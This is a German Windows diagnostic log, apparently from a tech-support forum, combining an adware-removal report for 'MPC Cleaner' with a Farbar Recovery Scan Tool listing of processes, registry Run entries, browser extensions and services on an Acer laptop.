"C:\PROGRA~2\MPC Cleaner\MPCProtectService.exe" not deleted
"C:\PROGRA~2\MPC Cleaner\MpcSafeDll.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\MpcSafeDll64.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\MPCTray.exe" not deleted
"C:\PROGRA~2\MPC Cleaner\MPCTray64.exe" not deleted
"C:\PROGRA~2\MPC Cleaner\Report.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\SafeNavi.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\SafeNavi64.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\SafeProtect.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Support.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\TrayFrame.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Update.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Utility.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Web.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\WinService.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\XBus.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\XProcessBus.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\XSkin.dll" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\Clean.xf" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\PlugIn.xf" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\DB\as.db" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\DB\cf.db" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\DB\run.db" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\DB\st.db" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\Tray\Lang.xf" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\Tray\Skin.xf" not deleted
"C:\PROGRA~2\MPC Cleaner" not deleted
"C:\PROGRA~2\MPC Cleaner\Config" not deleted
"C:\PROGRA~2\MPC Cleaner\Drivers" not deleted
"C:\PROGRA~2\MPC Cleaner\Exe" not deleted
"C:\PROGRA~2\MPC Cleaner\Image" not deleted
"C:\PROGRA~2\MPC Cleaner\Microsoft.VC90.CRT" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin" not deleted
"C:\PROGRA~2\MPC Cleaner\Config\DB" not deleted
"C:\PROGRA~2\MPC Cleaner\Image\SearchIcon" not deleted
"C:\PROGRA~2\MPC Cleaner\Image\SgIcon" not deleted
"C:\PROGRA~2\MPC Cleaner\Image\SoIcon" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\Cleaner" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\CrashReport" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\News" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\Tray" not deleted
"C:\PROGRA~2\MPC Cleaner\Skin\Uninstall" not deleted
==== System Specs ======================
Windows: Windows Version 6.2 (Build 9200)
Memory (RAM): 3912 MB
CPU Info: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
CPU Speed: 2494,7 MHz
Sound Card: Lautsprecher (High Definition A |
Display Adapters: Intel(R) HD Graphics 4000 | Intel(R) HD Graphics 4000 | Intel(R) HD Graphics 4000 | NVIDIA GeForce GT 630M
Monitors: 1x; PnP-Monitor (Standard) |
Screen Resolution: 1366 X 768 - 32 bit
Network: Network Present
Network Adapters: Virtueller Microsoft-Adapter für direktes WiFi | Qualcomm Atheros AR5BWB222 Wireless Network Adapter | Broadcom NetLink (TM) Gigabit Ethernet
CD / DVD Drives: 1x (D: | ) D: PIONEER DVD-RW DVRTD11RS
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 3 Button Mouse Present
Hard Disks: C: 443,3GB
Hard Disks - Free: C: 363,8GB
Manufacturer *: Acer
BIOS Info: AT/AT COMPATIBLE | | ACRSYS - 1
Time Zone: Mitteleuropäische Zeit
Motherboard *: Acer VA50_HC_CR
Country: Deutschland
Language: DEU
==== System Specs (Software) ======================
AV: McAfee Anti-Virus und Anti-Spyware *Disabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: McAfee Anti-Virus und Anti-Spyware *Disabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall *Disabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
Internet Explorer Version: 10.0.9200.16384
==== Orphaned Tasks deleted from Registry ======================
413dd5eb-db71-4664-be5d-a5a00235e071 deleted
Builder Touch deleted
Builder Touch2 deleted
ManzObscenelyAdV2 deleted
{0D0B7D47-0F7D-040B-7811-090D050F117E} deleted
==== Firefox Start and Search pages ======================
ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
ProfilePath: C:\Users\Manz\AppData\Roaming\Thunderbird\Profiles\ryn5yw3e.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
==== Firefox Extensions Registry ======================
[HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions]
"{4ED1F68A-5463-4931-9384-8FFF5ED91D92}"="C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi" [29.12.2015 12:20]
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"{4ED1F68A-5463-4931-9384-8FFF5ED91D92}"="C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi" [29.12.2015 12:20]
==== Firefox Extensions ======================
ProfilePath: C:\Users\Manz\AppData\Roaming\Thunderbird\Profiles\ryn5yw3e.default
- Lightning - %ProfilePath%\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103}
==== Firefox Plugins ======================
==== Chromium Look ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
fheoggkfdfchfphceeifdbepaooicaho - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx[29.12.2015 15:55]
SiteAdvisor - Manz\AppData\Local\Chromium\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho
==== Set IE to Default ======================
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="hxxp://go.microsoft.com/fwlink/?LinkId=69157"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"
==== All HKLM and HKCU SearchScopes ======================
HKLM\SearchScopes "DefaultScope"="{B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2}"
HKLM\SearchScopes\{B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} - hxxp://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2}"
HKLM\Wow6432Node\SearchScopes\{B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} - hxxp://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS
HKCU\SearchScopes "DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - hxxp://www.google.com/search?q={searchTerms}
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
HKCU\SearchScopes\{2DEFAF55-1981-4273-B141-DFD5ACCEBCB2} - hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
HKCU\SearchScopes\{41A2183B-D46F-4ACB-9F07-A0F2C3313AE2} - hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
HKCU\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45} - hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
HKCU\SearchScopes\{B0EC8E09-9A12-42A0-8972-CB73908A487E} - hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
HKCU\SearchScopes\{B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} - No_Url_Value
==== Deleting Registry Keys ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\203E62EEA6789D84098513925E9B9999 deleted successfully
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{EE26E302-876A-48D9-9058-3129E5B99999} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\203E62EEA6789D84098513925E9B9999 deleted successfully
==== Empty IE Cache ======================
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Manz\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Manz\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
==== Empty FireFox Cache ======================
C:\Users\Manz\AppData\Local\Mozilla\Firefox\Profiles\41A66E7E5EE1\cache2 emptied successfully
C:\Users\Manz\AppData\Local\Mozilla\Firefox\Profiles\6kib25c4.default\cache2 emptied successfully
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\cache2 emptied successfully
C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\cache2 emptied successfully
==== Empty Chrome Cache ======================
C:\Users\Manz\AppData\Local\Opera Software\Opera Stable\Cache emptied successfully
C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Cache emptied successfully
==== Empty All Flash Cache ======================
Flash Cache Emptied Successfully
==== Empty All Java Cache ======================
No Java Cache Found
==== C:\zoek_backup content ======================
C:\zoek_backup (files=179 folders=56 131580788 bytes)
==== Empty Temp Folders ======================
C:\Users\Administrator\AppData\Local\Temp emptied successfully
C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Manz\AppData\Local\Temp will be emptied at reboot
C:\Users\UpdatusUser\AppData\Local\Temp emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\WINDOWS\Temp will be emptied at reboot
==== After Reboot ======================
==== Empty Temp Folders ======================
C:\WINDOWS\Temp successfully emptied
C:\Users\Manz\AppData\Local\Temp successfully emptied
==== Empty Recycle Bin ======================
C:\$RECYCLE.BIN successfully emptied
==== Deleting Files / Folders ======================
"C:\PROGRA~2\MPC Cleaner\AdbWinApi.dll" not found
"C:\PROGRA~2\MPC Cleaner\AdbWinUsbApi.dll" not found
"C:\PROGRA~2\MPC Cleaner\AndriodServer.dll" not found
"C:\PROGRA~2\MPC Cleaner\BrowserPlugIn.dll" not found
"C:\PROGRA~2\MPC Cleaner\Cleaner.dll" not found
"C:\PROGRA~2\MPC Cleaner\Database.dll" not found
"C:\PROGRA~2\MPC Cleaner\LogReport.dll" not found
"C:\PROGRA~2\MPC Cleaner\LpcManager.dll" not found
"C:\PROGRA~2\MPC Cleaner\Monitor.dll" not found
"C:\PROGRA~2\MPC Cleaner\MPCProtectService.exe" not found
"C:\PROGRA~2\MPC Cleaner\MpcSafeDll.dll" not found
"C:\PROGRA~2\MPC Cleaner\MpcSafeDll64.dll" not found
"C:\PROGRA~2\MPC Cleaner\MPCTray.exe" not found
"C:\PROGRA~2\MPC Cleaner\MPCTray64.exe" not found
"C:\PROGRA~2\MPC Cleaner\Report.dll" not found
"C:\PROGRA~2\MPC Cleaner\SafeNavi.dll" not found
"C:\PROGRA~2\MPC Cleaner\SafeNavi64.dll" not found
"C:\PROGRA~2\MPC Cleaner\SafeProtect.dll" not found
"C:\PROGRA~2\MPC Cleaner\Support.dll" not found
"C:\PROGRA~2\MPC Cleaner\TrayFrame.dll" not found
"C:\PROGRA~2\MPC Cleaner\Update.dll" not found
"C:\PROGRA~2\MPC Cleaner\Utility.dll" not found
"C:\PROGRA~2\MPC Cleaner\Web.dll" not found
"C:\PROGRA~2\MPC Cleaner\WinService.dll" not found
"C:\PROGRA~2\MPC Cleaner\XBus.dll" not found
"C:\PROGRA~2\MPC Cleaner\XProcessBus.dll" not found
"C:\PROGRA~2\MPC Cleaner\XSkin.dll" not found
"C:\PROGRA~2\MPC Cleaner\Config\Clean.xf" not found
"C:\PROGRA~2\MPC Cleaner\Config\PlugIn.xf" not found
"C:\PROGRA~2\MPC Cleaner\Config\DB\as.db" not found
"C:\PROGRA~2\MPC Cleaner\Config\DB\cf.db" not found
"C:\PROGRA~2\MPC Cleaner\Config\DB\run.db" not found
"C:\PROGRA~2\MPC Cleaner\Config\DB\st.db" not found
"C:\PROGRA~2\MPC Cleaner\Skin\Tray\Lang.xf" not found
"C:\PROGRA~2\MPC Cleaner\Skin\Tray\Skin.xf" not found
"C:\PROGRA~2\MPC Cleaner" not found
==== EOF on 08.02.2016 at 0:21:31,48 ======================
FRST Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
durchgeführt von Manz (Administrator) auf HAUS (08-02-2016 00:27:57)
Gestartet von E:\
Geladene Profile: Manz (Verfügbare Profile: Manz & UpdatusUser & Administrator)
Platform: Windows 8 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 10 (Standard-Browser: IE)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
(Atheros) C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(1und1 Mail und Media GmbH) C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McUICnt.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-07-31] ()
HKLM-x32\...\Run: [BakupManagerTray] => C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe [533568 2012-08-22] (NTI Corporation)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.)
HKLM-x32\...\Run: [MailCheck IE Broker] => C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe [2171456 2015-12-17] (1und1 Mail und Media GmbH)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [247144 2012-10-08] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [247144 2012-10-08] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [202600 2012-10-08] (NVIDIA Corporation)
AppInit_DLLs-x32: , C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [202600 2012-10-08] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-02-08]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [DhcpNameServer] 150.200.3.1
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> DefaultScope {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {2DEFAF55-1981-4273-B141-DFD5ACCEBCB2} URL = hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {41A2183B-D46F-4ACB-9F07-A0F2C3313AE2} URL = hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B0EC8E09-9A12-42A0-8972-CB73908A487E} URL = hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} URL =
BHO: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO-x32: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\mcieplg.dll [2015-12-29] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\mcieplg.dll [2015-12-29] (McAfee, Inc.)
Handler: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler-x32: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\mcieplg.dll [2015-12-29] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\mcieplg.dll [2015-12-29] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2014-04-25] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2014-04-25] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2014-04-25] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2014-04-25] ()
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-12-29]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-02-07] [ist nicht signiert]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] <==== ACHTUNG
Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-07]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-07]
==================== Dienste (Nicht auf der Ausnahmeliste) ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [207488 2012-07-31] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
U2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [158952 2015-12-29] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [178528 2014-04-25] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\mcafee\msc\McAWFwk.exe [332080 2012-01-26] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
S2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [603424 2014-10-08] (McAfee, Inc.)
S2 McOobeSv; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [1041192 2014-08-20] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [219752 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [189912 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-08-22] (NTI Corporation)
R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-09-11] (Dritek System INC.)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [15440 2012-07-26] (Microsoft Corporation)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-08-01] (Atheros) [Datei ist nicht signiert]
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [X]
